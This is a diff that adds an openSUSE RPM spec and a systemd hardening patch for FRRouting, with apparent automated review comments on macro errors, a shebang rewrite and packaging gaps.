+Requires(preun):%{install_info_prereq}
+Recommends: logrotate
+Conflicts: quagga
+Provides: zebra = %{version}
+Obsoletes: zebra < %{version}
+Provides: group(%{frr_group})
+Provides: group(%{frrvty_group})
+Provides: user(%{frr_user})
+
+%description
+FRR is free software that implements and manages various IPv4 and IPv6 routing protocols.
+FRR currently supports the following protocols:
+- BGP
+- OSPFv2
+- OSPFv3
+- RIPv1
+- RIPv2
+- RIPng
+- IS-IS
+- PIM-SM/MSDP
+- LDP
+- BFD
+- Babel
+- PBR
+- OpenFabric
+- VRRP
+- EIGRP (alpha)
+- NHRP (alpha)
+
+%package -n libfrrfpm_pb0
+Summary: FRRouting fpm protobuf library
+Group: System/Libraries
+
+%description -n libfrrfpm_pb0
+This library contains forwarding plane manager protobuf definitions
+for FRRouting.
+
+%package -n libfrr_pb0
+Summary: FRRouting protobuf library
+Group: System/Libraries
+
+%description -n libfrr_pb0
+This library contains protobuf memory management for FRRouting..
+
+%if %{with grpc}
+%package -n libfrrgrpc_pb0
+Summary: FRRouting grpc protobuf library
+Group: System/Libraries
+
+%description -n libfrrgrpc_pb0
+This library contains grpc protobuf definitions for FRRouting. 
+%endif
+
+%package -n libfrrospfapiclient0
+Summary: API for FRRouting's OSPFv2 implementation
+Group: System/Libraries
+
+%description -n libfrrospfapiclient0
+This library contains part of the OSPFv2 implementation of FRRouting.
+
+%package -n libfrrsnmp0
+Summary: FRRouting snmp library
+Group: System/Libraries
+
+%description -n libfrrsnmp0
+This library contains part of the net-snmp agentx implementation of FRRouting.
+
+%package -n libfrrzmq0
+Summary: FRRouting zeromq library
+Group: System/Libraries
+
+%description -n libfrrzmq0
+This library contains part of the zermomq implementation of FRRouting.
+
+%package -n libfrr0
+Summary: FRRouting utility library
+Group: System/Libraries
+
+%description -n libfrr0
+This library contains various utility functions to FRRouting, such as
+data types, buffers and socket handling.
+
+%package -n libfrrcares0
+Summary: FRRouting utility library
+Group: System/Libraries
+
+%description -n libfrrcares0
+This library contains various utility functions to FRRouting, such as
+data types, buffers and socket handling.
+
+%package -n libmgmt_be_nb0
+Summary: FRRouting utility library
+Group: System/Libraries
+
+%description -n libmgmt_be_nb0
+This library contains part of the mgmt_be implementation of FRRouting.
+
+%package devel
+Summary: Header and object files for frr development
+Group: Development/Libraries/C and C++
+Requires: libfrr0 = %{version}
+Requires: libfrr_pb0 = %{version}
+Requires: libfrrcares0 = %{version}
+Requires: libfrrfpm_pb0 = %{version}
+%if %{with grpc}
+Requires: libfrrgrpc_pb0 = %{version}
+%endif
+Requires: libfrrospfapiclient0 = %{version}
+Requires: libfrrsnmp0 = %{version}
+Requires: libfrrzmq0 = %{version}
+Requires: libmgmt_be_nb0 = %{version}
+
+%description devel
+The frr-devel package contains the header and object files necessary for
+developing OSPF-API and frr applications. 
+
+%prep
+%autosetup -n %{name}-%{name}-%{version} -p1
+
+%build
+# GCC LTO objects must be "fat" to avoid assembly errors
+export CFLAGS="-ffat-lto-objects"
+
+autoreconf -fiv
+%configure \
+ --disable-silent-rules \
+ --sysconfdir=%{_sysconfdir}\
+ --localstatedir=%{_rundir} \
+ --sbindir=%{frr_daemondir} \
+ --with-moduledir=%{_libdir}/frr/modules \
+ --disable-static \
+ --with-vtysh-pager=%{_bindir}/less \
+ --enable-user=%{frr_user} \
+ --enable-group=%{frr_group} \
+ --enable-vty-group=%{frrvty_group} \
+ --enable-configfile-mask=0640 \
+ --enable-logfile-mask=0640 \
+ --enable-doc \
+ --enable-doc-html \
+ --enable-babeld \
+ --enable-bfdd \
+ --enable-bgpd \
+ --enable-bgp-vnc \
+%if %{with cumulus}
+ --enable-cumulus \
+%endif
+%if %{with datacenter}
+ --enable-datacenter \
+%endif
+ --enable-eigrpd \
+ --enable-fpm \
+ --enable-irdp \
+ --enable-isisd \
+ --enable-ldpd \
+ --enable-multipath=256 \
+ --enable-nhrpd \
+ --enable-snmp \
+ --enable-zeromq \
+ --enable-ospfd \
+ --enable-ospf6d \
+ --enable-ospfapi \
+ --enable-ospfclient \
+ --with-libpam \
+ --enable-pbrd \
+ --enable-pimd \
+ --enable-pim6d \
+ --enable-protobuf \
+ --enable-ripd \
+ --enable-ripngd \
+ --enable-rpki \
+ --enable-rtadv \
+ --enable-sharpd \
+ --enable-staticd \
+ --enable-vtysh \
+ --enable-watchfrr \
+ --enable-zebra \
+ --enable-realms \
+ --enable-shell-access \
+ --with-crypto=openssl \
+ --enable-config-rollbacks \
+%if %{with grpc}
+ --enable-grpc
+%endif
+
+make %{?_smp_mflags} MAKEINFO="makeinfo --no-split"
+
+%install
+make DESTDIR=%{buildroot} INSTALL="install -p" CP="cp -p" install
+perl -p -i -e 's|#!/usr/bin/python|#!/usr/bin/python3|g' %{buildroot}/usr/lib/frr/{frr-reload.py,generate_support_bundle.py}
+
+find %{buildroot} -type f -name "*.la" -delete -print
+
+install -d %{buildroot}%{_sysconfdir}/frr
+install -d %{buildroot}/%{_docdir}/%{name}
+mv %{buildroot}/%{_datadir}/doc/frr/html %{buildroot}/%{_docdir}/%{name}
+
+# remove stray buildinfo files
+find 
%{buildroot}/%{_docdir}/%{name} -type f -name .buildinfo -delete
+
+# systemd init scripts
+install -D -m 0644 tools/frr.service %{buildroot}%{_unitdir}/frr.service
+install -D -m 0644 tools%{_sysconfdir}/frr/daemons %{buildroot}%{_sysconfdir}/frr/daemons
+
+# add rpki module to daemon
+sed -i -e 's/^\(bgpd_options=\)\(.*\)\(".*\)/\1\2 -M rpki\3/' %{buildroot}%{_sysconfdir}/frr/daemons
+
+%if 0%{?suse_version} > 1500
+mkdir -p %{buildroot}%{_pam_vendordir}
+install -D -m 0644 redhat/frr.pam %{buildroot}%{_pam_vendordir}/frr
+%else
+install -D -m 0644 redhat/frr.pam %{buildroot}%{_sysconfdir}/pam.d/frr
+%endif
+%if 0%{?suse_version} > 1500
+install -D -m 0644 redhat/frr.logrotate %{buildroot}%{_distconfdir}/logrotate.d/frr
+%else
+install -D -m 0644 redhat/frr.logrotate %{buildroot}%{_sysconfdir}/logrotate.d/frr
+%endif
+
+install -d -m 0750 %{buildroot}%{rundir}
+install -d -m 0750 %{buildroot}%{_localstatedir}/log/frr
+install -D -m 0644 %{SOURCE1} %{buildroot}/%{_tmpfilesdir}/%{name}.conf
+sed -e "s|@frr_statedir@|%{frr_statedir}|g" -i %{buildroot}/%{_tmpfilesdir}/%{name}.conf
+
+install -d %{buildroot}%{_sbindir}
+ln -s %{_sbindir}/service %{buildroot}%{_sbindir}/rcfrr
+rm -f %{buildroot}%{frr_daemondir}/ssd
+
+cat > %{buildroot}%{_sysconfdir}/frr/frr.conf << __EOF__
+!hostname frr
+
+!password frr
+!enable password frr
+
+log file %{_localstatedir}/log/frr/frr.log
+__EOF__
+cat > %{buildroot}%{_sysconfdir}/frr/vtysh.conf << __EOF__
+! vtysh is using PAM authentication allowing root to use it. 
+__EOF__
+
+%check
+make %{?_smp_mflags} -C tests
+
+%pre
+# Create frr user/groups
+getent group %{frr_group} >/dev/null || groupadd -r %{frr_group}
+getent group %{frrvty_group} >/dev/null || groupadd -r %{frrvty_group}
+getent passwd %{frr_user} >/dev/null || useradd -r -g %{frr_group} -G %{frrvty_group} -d %{frr_home} -s /sbin/nologin -c "FRRouting suite" %{frr_user}
+
+%service_add_pre %{name}.service
+%if 0%{?suse_version} > 1500
+# Prepare for migration to /usr/etc; save any old .rpmsave
+for i in logrotate.d/frr pam.d/frr ; do
+ test -f %{_sysconfdir}/${i}.rpmsave && mv -v %{_sysconfdir}/${i}.rpmsave %{_sysconfdir}/${i}.rpmsave.old ||:
+done
+%endif
+
+%posttrans
+%if 0%{?suse_version} > 1500
+# Migration to /usr/etc, restore just created .rpmsave
+for i in logrotate.d/frr pam.d/frr ; do
+ test -f %{_sysconfdir}/${i}.rpmsave && mv -v %{_sysconfdir}/${i}.rpmsave %{_sysconfdir}/${i} ||:
+done
+%endif
+
+%post
+%service_add_post %{name}.service
+%install_info --info-dir=%{_infodir} %{_infodir}/%{name}.info%{ext_info}
+%tmpfiles_create %{_tmpfilesdir}/%{name}.conf || true
+
+%preun
+%service_del_preun %{name}.service
+
+%postun
+%service_del_postun %{name}.service
+%install_info_delete --info-dir=%{_infodir} %{_infodir}/frr.info%{ext_info}
+
+%post -n libfrr_pb0 -p /sbin/ldconfig
+%postun -n libfrr_pb0 -p /sbin/ldconfig
+%if %{with grpc}
+%post -n libfrrgrpc_pb0 -p /sbin/ldconfig
+%postun -n libfrrgrpc_pb0 -p /sbin/ldconfig
+%endif
+%post -n libfrrfpm_pb0 -p /sbin/ldconfig
+%postun -n libfrrfpm_pb0 -p /sbin/ldconfig
+
+%post -n libfrrospfapiclient0 -p /sbin/ldconfig
+%postun -n libfrrospfapiclient0 -p /sbin/ldconfig
+
+%post -n libfrrsnmp0 -p /sbin/ldconfig
+%postun -n libfrrsnmp0 -p /sbin/ldconfig
+
+%post -n libfrrzmq0 -p /sbin/ldconfig
+%postun -n libfrrzmq0 -p /sbin/ldconfig
+
+%post -n libfrr0 -p /sbin/ldconfig
+%postun -n libfrr0 -p /sbin/ldconfig
+
+%post -n libfrrcares0 -p /sbin/ldconfig
+%postun -n libfrrcares0 -p /sbin/ldconfig
+
+%post -n 
libmgmt_be_nb0 -p /sbin/ldconfig
+%postun -n libmgmt_be_nb0 -p /sbin/ldconfig
+
+%files
+%license COPYING
+%doc README.md
+%doc doc/mpls
+%dir %attr(750,%{frr_user},%{frr_user}) %{_sysconfdir}/%{name}
+%config(noreplace) %attr(640,%{frr_user},%{frr_group}) %{_sysconfdir}/%{name}/[!v]*.conf*
+%config(noreplace) %attr(640,%{frr_user},%{frrvty_group}) %{_sysconfdir}/%{name}/vtysh.conf
+%config(noreplace) %%attr(640,%{frr_user},%{frr_group}) %{_sysconfdir}/%{name}/daemons
+%if 0%{?suse_version} > 1500
+%{_pam_vendordir}/frr
+%else
+%config(noreplace) %{_sysconfdir}/pam.d/frr
+%endif
+%if 0%{?suse_version} > 1500
+%{_distconfdir}/logrotate.d/frr
+%else
+%config(noreplace) %{_sysconfdir}/logrotate.d/frr
+%endif
+%{_infodir}/frr.info%{?ext_info}
+%{_mandir}/man?/*
+%{_docdir}/%{name}/html
+%{_unitdir}/%{name}.service
+%dir %{_tmpfilesdir}
+%{_tmpfilesdir}/%{name}.conf
+%dir %attr(-,%{frr_user},%{frr_group}) %{_localstatedir}/log/frr
+%dir %attr(-,%{frr_user},%{frr_group}) %ghost %{frr_statedir}
+%{_sbindir}/rc%{name}
+%dir %{_prefix}/lib/frr
+%{_prefix}/lib/frr/fabricd
+%{_prefix}/lib/frr/vrrpd
+%{_datadir}/yang
+%{_bindir}/mtracebis
+%{_bindir}/vtysh
+%{frr_daemondir}/babeld
+%{frr_daemondir}/bfdd
+%{frr_daemondir}/bgpd
+%{frr_daemondir}/eigrpd
+%{frr_daemondir}/frr
+%{frr_daemondir}/frr-reload
+%{frr_daemondir}/frr-reload.py
+%{frr_daemondir}/frr_babeltrace.py
+%{frr_daemondir}/frrcommon.sh
+%{frr_daemondir}/frrinit.sh
+%{frr_daemondir}/isisd
+%{frr_daemondir}/ldpd
+%{frr_daemondir}/mgmtd
+%{frr_daemondir}/nhrpd
+%{frr_daemondir}/ospfclient.py
+%{frr_daemondir}/ospf6d
+%{frr_daemondir}/ospfd
+%{frr_daemondir}/pathd
+%{frr_daemondir}/pbrd
+%{frr_daemondir}/pimd
+%{frr_daemondir}/pim6d
+%{frr_daemondir}/ripd
+%{frr_daemondir}/ripngd
+%{frr_daemondir}/sharpd
+%{frr_daemondir}/staticd
+%{frr_daemondir}/watchfrr
+%{frr_daemondir}/watchfrr.sh
+%{frr_daemondir}/zebra
+%dir %{_libdir}/frr
+%dir %{_libdir}/frr/modules
+%{_libdir}/frr/modules/zebra_cumulus_mlag.so 
+%{_libdir}/frr/modules/zebra_fpm.so
+%{_libdir}/frr/modules/zebra_irdp.so
+%{_libdir}/frr/modules/pathd_pcep.so
+%{_libdir}/frr/modules/bgpd_rpki.so
+%if %{with grpc}
+%{_libdir}/frr/modules/grpc.so
+%endif
+%{_libdir}/frr/modules/dplane_fpm_nl.so
+%{_libdir}/frr/modules/bgpd_bmp.so
+%{_prefix}/lib/frr/generate_support_bundle.py
+
+%files -n libfrr_pb0
+%{_libdir}/libfrr_pb.so.0*
+
+%files -n libfrrfpm_pb0
+%{_libdir}/libfrrfpm_pb.so.0*
+
+%if %{with grpc}
+%files -n libfrrgrpc_pb0
+%{_libdir}/libfrrgrpc_pb.so.0*
+%endif
+
+%files -n libfrrospfapiclient0
+%{_libdir}/libfrrospfapiclient.so.0*
+
+%files -n libfrrsnmp0
+%{_libdir}/libfrrsnmp.so.0*
+%{_libdir}/frr/modules/*_snmp.so
+
+%files -n libfrrzmq0
+%{_libdir}/libfrrzmq.so.0*
+
+%files -n libfrr0
+%{_libdir}/libfrr.so.0*
+
+%files -n libfrrcares0
+%{_libdir}/libfrrcares.so.0*
+
+%files -n libmgmt_be_nb0
+%{_libdir}/libmgmt_be_nb.so.0*
+
+%files devel
+%dir %{_includedir}/%{name}
+%{_includedir}/%{name}/*.h
+%dir %{_includedir}/%{name}/ospfd
+%{_includedir}/%{name}/ospfd/*.h
+%dir %{_includedir}/%{name}/ospfapi
+%{_includedir}/%{name}/ospfapi/*.h
+%dir %{_includedir}/%{name}/eigrpd
+%{_includedir}/%{name}/eigrpd/*.h
+%dir %{_includedir}/%{name}/bfdd
+%{_includedir}/%{name}/bfdd/*.h
+%{_libdir}/lib*.so
+
+%changelog
diff --git a/harden_frr.service.patch b/harden_frr.service.patch
new file mode 100644
index 0000000..daef202
--- /dev/null
+++ b/harden_frr.service.patch
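Review bot: `install -d -m 0750 %{buildroot}%{rundir}` in %install references a macro this spec never defines — the runtime directory is defined as `frr_statedir` (`%{_rundir}/%{name}`) — so rpm leaves the token unexpanded and the shell creates a directory literally named `%{rundir}` under the buildroot instead of the ghosted `%{frr_statedir}` that %files lists; it should read `install -d -m 0750 %{buildroot}%{frr_statedir}`. In %files, the `%%attr(640,%{frr_user},%{frr_group})` on the `daemons` entry looks like a typo for `%attr`; if macro expansion does not reduce the doubled percent to a single `%attr`, the file that carries `bgpd_options` ships with default root:root 0644 ownership, so the packaged result is worth confirming with `rpm -qlv`. The perl substitution `s|#!/usr/bin/python|#!/usr/bin/python3|g` is unanchored and its pattern is a prefix of `#!/usr/bin/python3`, so a shebang that is already correct would be rewritten to `python33`; anchoring it as `s|^#!/usr/bin/python$|#!/usr/bin/python3|` makes the rewrite idempotent, and using `%{frr_daemondir}` instead of the hard-coded `/usr/lib/frr` keeps it in step with `--sbindir`. On the documentation side, `%description -n libfrrcares0` repeats the libfrr0 text verbatim and `libmgmt_be_nb0` reuses the "FRRouting utility library" summary, so the sub-package descriptions no longer tell the reader what each library is.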
@@ -0,0 +1,42 @@ +Index: frr-frr-8.1/tools/frr.service.in +=================================================================== +--- frr-frr-8.1.orig/tools/frr.service.in ++++ frr-frr-8.1/tools/frr.service.in +@@ -7,6 +7,16 @@ Before=network.target + OnFailure=heartbeat-failed@%n + + [Service] ++# added automatically, for details please see ++# https://en.opensuse.org/openSUSE:Security_Features#Systemd_hardening_effort ++ProtectSystem=full ++ReadWritePaths=/etc/frr ++ProtectHome=true ++ProtectKernelModules=true ++ProtectKernelLogs=true ++ProtectControlGroups=true ++RestrictRealtime=true ++# end of automatic additions + Nice=-5 + Type=forking + NotifyAccess=all +Index: frr-frr-8.1/tools/frr@.service.in +=================================================================== +--- frr-frr-8.1.orig/tools/frr@.service.in ++++ frr-frr-8.1/tools/frr@.service.in +@@ -7,6 +7,16 @@ Before=network.target + OnFailure=heartbeat-failed@%n + + [Service] ++# added automatically, for details please see ++# https://en.opensuse.org/openSUSE:Security_Features#Systemd_hardening_effort ++ProtectSystem=full ++ReadWritePaths=/etc/frr ++ProtectHome=true ++ProtectKernelModules=true ++ProtectKernelLogs=true ++ProtectControlGroups=true ++RestrictRealtime=true ++# end of automatic additions + Nice=-5 + Type=forking + NotifyAccess=all
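Review bot: The second half of this patch, the `tools/frr@.service.in` hunk, is never exercised by this package: %install copies only `tools/frr.service` and %files lists only `%{_unitdir}/%{name}.service`, so the hardened template unit is not shipped and the hunk only adds rebase surface; either drop it or install and package `frr@.service` as well. The `Index:` and `---`/`+++` headers still name `frr-frr-8.1` while the spec builds 10.0.2, and the `# added automatically ... # end of automatic additions` markers read as tool output although the stanza is now hand-maintained; refreshing the headers on the next rebase and replacing the markers with a short note such as `# openSUSE systemd hardening stanza; keep identical in frr.service.in and frr@.service.in` would make future updates less error-prone. `ProtectSystem=full` leaves /var and /run writable, which is presumably why the log directory and `%{frr_statedir}` need no `ReadWritePaths` entry alongside `/etc/frr`, and a one-line comment recording that reasoning (and whether omitting `ProtectKernelTunables` is deliberate, since the routing daemons presumably need to adjust forwarding sysctls — confirm) would spare the next maintainer from re-deriving it.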